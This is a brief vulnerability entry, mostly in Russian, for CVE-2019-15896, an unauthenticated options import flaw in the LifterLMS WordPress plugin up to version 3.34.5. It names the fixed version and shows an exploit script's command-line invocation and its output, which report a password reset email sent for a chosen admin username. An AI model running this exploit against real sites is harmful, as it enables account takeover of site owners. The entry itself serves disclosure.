
LifterLMS <= 3.34.5 - Неаутентифицированный импорт опций
LifterLMS <= 3.34.5 - Неаутентифицированный импорт опций
Неаутентифицированный импорт опций, который может привести к:
Проблемы были исправлены в версии 3.35.0. Однако в v3.35.1 была добавлена дополнительная санитизация и фильтрация ввода.
$ python3 CVE-2019-15896.py --url http://wordpress.lan --username radmin --email [email protected] LifterLMS <= 3.34.5 - Unauthenticated Options Import Exploit By Ramdom Robbie Once ran check your email for the forgotten password link. Password reset email sent to [email protected]
Информация
---
Requires access to login.php and working email address and the site needs to be able to send emails